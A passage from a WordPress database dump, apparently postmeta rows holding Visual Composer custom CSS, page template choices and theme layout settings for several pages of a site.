!important;}'),(39324,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39325,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39326,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39327,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39328,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39329,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39330,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39331,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(39332,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(39333,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(39334,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(39335,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(39336,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(39337,1827,'_wp_page_template','full-width.php'),(39338,1827,'slide_template','default'),(39339,1827,'_wpb_vc_js_status','true'),(39340,1827,'mkdf_page_content_behind_header_meta','no'),(39341,1827,'mkdf_disable_vertical_header_background_image_meta','no'),(39342,1827,'mkdf_disable_header_widget_areas_meta','no'),(39343,1827,'mkdf_page_content_padding','120px 0 100px'),(39344,1827,'_dp_original','1804'),(39345,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39346,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(39347,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39348,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39349,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39350,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39351,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39352,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39353,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39354,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39355,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(39356,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(39357,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(39358,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(39359,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(39360,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(39361,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(39362,1836,'_wp_page_template','full-width.php'),(39363,1836,'slide_template','default'),(39364,1836,'_wpb_vc_js_status','true'),(39365,1836,'mkdf_page_content_behind_header_meta','no'),(39366,1836,'mkdf_disable_vertical_header_background_image_meta','no'),(39367,1836,'mkdf_disable_header_widget_areas_meta','no'),(39368,1836,'mkdf_page_content_padding','120px 0 140px'),(39369,1836,'_dp_original','1827'),(39370,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39371,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(39372,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39373,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39374,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39375,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39376,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39377,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39378,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39379,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39380,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39381,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(39382,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(39383,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(39384,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(39385,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(39386,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(39387,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(39388,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(39389,1852,'_wp_page_template','full-width.php'),(39390,1852,'slide_template','default'),(39391,1852,'_wpb_vc_js_status','true'),(39392,1852,'mkdf_page_content_behind_header_meta','no'),(39393,1852,'mkdf_disable_vertical_header_background_image_meta','no'),(39394,1852,'mkdf_disable_header_widget_areas_meta','no'),(39395,1852,'mkdf_page_content_padding','0'),(39396,1852,'_dp_original','1836'),(39397,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39398,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(39399,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39400,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39401,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39402,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39403,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39404,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39405,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39406,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39407,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39408,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39409,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(39410,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(39411,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(39412,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(39413,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(39414,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(39415,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(39416,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(39417,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(39418,1857,'_wp_page_template','full-width.php'),(39419,1857,'slide_template','default'),(39420,1857,'_wpb_vc_js_status','true'),(39421,1857,'mkdf_page_content_behind_header_meta','no'),(39422,1857,'mkdf_disable_vertical_header_background_image_meta','no'),(39423,1857,'mkdf_disable_header_widget_areas_meta','no'),(39424,1857,'mkdf_page_content_padding','0'),(39425,1857,'_dp_original','1852'),(39426,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39427,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(39428,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39429,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39430,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39431,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39432,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39433,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(39434,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(39435,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(39436,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(39437,3074,'_wp_page_template','full-width.php'),(39438,3074,'slide_template','default'),(39439,3074,'_wpb_vc_js_status','true'),(39440,3074,'mkdf_page_content_behind_header_meta','no'),(39441,3074,'mkdf_disable_vertical_header_background_image_meta','no'),(39442,3074,'mkdf_disable_header_widget_areas_meta','no'),(39443,3074,'mkdf_page_content_padding','120px 0 60px'),(39444,3074,'_dp_original','1382'),(39445,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39446,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(39447,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39448,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39449,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39450,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39451,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39452,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39453,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(39454,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(39455,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(39456,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(39457,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(39458,1948,'_wp_page_template','full-width.php'),(39459,1948,'slide_template','default'),(39460,1948,'_wpb_vc_js_status','true'),(39461,1948,'mkdf_page_content_behind_header_meta','no'),(39462,1948,'mkdf_disable_vertical_header_background_image_meta','no'),(39463,1948,'mkdf_disable_header_widget_areas_meta','no'),(39464,1948,'mkdf_page_content_padding','105px 0 60px'),(39465,1948,'_dp_original','1904'),(39466,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39467,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39468,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39469,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39470,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39471,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39472,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39473,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39474,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39475,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39476,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39477,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39478,1995,'_wp_page_template','full-width.php'),(39479,1995,'slide_template','default'),(39480,1995,'_wpb_vc_js_status','true'),(39481,1995,'mkdf_page_content_behind_header_meta','no'),(39482,1995,'mkdf_disable_vertical_header_background_image_meta','no'),(39483,1995,'mkdf_disable_header_widget_areas_meta','no'),(39484,1995,'mkdf_page_content_padding','0'),(39485,1995,'_dp_original','1857'),(39486,1995,'_wpb_shortcodes_custom_css','.vc_custom_1535012679341{padding-top: 105px !important;padding-bottom: 90px !important;}.vc_custom_1535469268578{padding-top: 105px !important;padding-bottom: 90px !important;}'),(39487,2019,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39488,2019,'_wp_page_template','full-width.php'),(39489,2019,'slide_template','default'),(39490,2019,'_wpb_vc_js_status','true'),(39491,2019,'mkdf_page_content_behind_header_meta','no'),(39492,2019,'mkdf_disable_vertical_header_background_image_meta','no'),(39493,2019,'mkdf_disable_header_widget_areas_meta','no'),(39494,2019,'_wpb_shortcodes_custom_css','.vc_custom_1535019332070{padding-top: 43px !important;padding-bottom: 100px !important;}'),(39495,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39496,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(39497,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39498,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39499,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39500,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39501,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(39502,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(39503,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(39504,2174,'_wp_page_template','full-width.php'),(39505,2174,'slide_template','default'),(39506,2174,'_wpb_vc_js_status','true'),(39507,2174,'mkdf_page_content_behind_header_meta','no'),(39508,2174,'mkdf_disable_vertical_header_background_image_meta','no'),(39509,2174,'mkdf_disable_header_widget_areas_meta','no'),(39510,2174,'mkdf_page_content_padding','120px 0'),(39511,2174,'_dp_original','1297'),(39512,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39513,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39514,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39515,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39516,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39517,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39518,2387,'_wp_page_template','full-width.php'),(39519,2387,'slide_template','default'),(39520,2387,'_wpb_vc_js_status','true'),(39521,2387,'mkdf_page_content_behind_header_meta','no'),(39522,2387,'mkdf_disable_vertical_header_background_image_meta','no'),(39523,2387,'mkdf_disable_header_widget_areas_meta','no'),(39524,2387,'mkdf_page_content_padding','120px 0 100px'),(39525,2387,'_dp_original','1382'),(39526,2419,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39527,2419,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39528,2419,'_wp_page_template','blog-standard'),(39529,2419,'slide_template','default'),(39530,2419,'_wpb_vc_js_status','false'),(39531,2419,'mkdf_page_content_behind_header_meta','no'),(39532,2419,'mkdf_blog_category_meta','recepies'),(39533,2419,'mkdf_show_posts_per_page_meta','5'),(39534,2419,'mkdf_sidebar_layout_meta','sidebar-25-left'),(39535,2419,'mkdf_disable_vertical_header_background_image_meta','no'),(39536,2419,'mkdf_disable_header_widget_areas_meta','no'),(39537,2419,'mkdf_page_content_padding','120px 0 100px'),(39538,2419,'_dp_original','1679'),(39539,2421,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39540,2421,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39541,2421,'_wp_page_template','blog-standard'),(39542,2421,'slide_template','default'),(39543,2421,'_wpb_vc_js_status','false'),(39544,2421,'mkdf_page_content_behind_header_meta','no'),(39545,2421,'mkdf_blog_category_meta','recepies'),(39546,2421,'mkdf_show_posts_per_page_meta','5'),(39547,2421,'mkdf_sidebar_layout_meta','no-sidebar'),(39548,2421,'mkdf_disable_vertical_header_background_image_meta','no'),(39549,2421,'mkdf_disable_header_widget_areas_meta','no'),(39550,2421,'mkdf_page_content_padding','120px 0 100px'),(39551,2421,'_dp_original','1679'),(39552,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39553,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39554,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39555,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39556,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39557,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39558,2435,'_wp_page_template','full-width.php'),(39559,2435,'slide_template','default'),(39560,2435,'_wpb_vc_js_status','true'),(39561,2435,'mkdf_page_content_behind_header_meta','no'),(39562,2435,'mkdf_disable_vertical_header_background_image_meta','no'),(39563,2435,'mkdf_disable_header_widget_areas_meta','no'),(39564,2435,'mkdf_page_content_padding','120px 0 0'),(39565,2435,'_dp_original','1742'),(39566,2448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39567,2448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39568,2448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39569,2448,'_wp_page_template','full-width.php'),(39570,2448,'slide_template','default'),(39571,2448,'_wpb_vc_js_status','true'),(39572,2448,'mkdf_page_content_behind_header_meta','no'),(39573,2448,'mkdf_page_content_padding','0 0 0 0 '),(39574,2448,'mkdf_page_content_padding_mobile','0 0 0 0'),(39575,2448,'mkdf_set_menu_area_position_meta','center'),(39576,2448,'mkdf_disable_vertical_header_background_image_meta','no'),(39577,2448,'mkdf_menu_area_background_color_meta','#ffffff'),(39578,2448,'mkdf_menu_area_background_transparency_meta','40%'),(39579,2448,'mkdf_disable_header_widget_areas_meta','no'),(39580,2448,'mkdf_show_title_area_meta','no'),(39581,2448,'mkdf_disable_footer_meta','yes'),(39582,2448,'mkdf_header_type_meta','header-standard'),(39583,2448,'mkdf_custom_header_widget_area_one_meta','custom-opener'),(39584,2448,'mkdf_header_behaviour_meta','no-behavior'),(39585,2448,'_dp_original','1811'),(39586,2448,'_wpb_shortcodes_custom_css','.vc_custom_1535553249523{padding-top: 100px !important;padding-bottom: 100px !important;background-color: #e7dfdf !important;}'),(39587,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39588,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39589,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39590,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(39591,2457,'_wp_page_template','default'),(39592,2457,'slide_template','default'),(39593,2457,'_wpb_vc_js_status','true'),(39594,2457,'mkdf_page_content_behind_header_meta','no'),(39595,2457,'mkdf_page_content_padding','100px 0 120px 0'),(39596,2457,'mkdf_page_content_padding_mobile','100px 0 120px 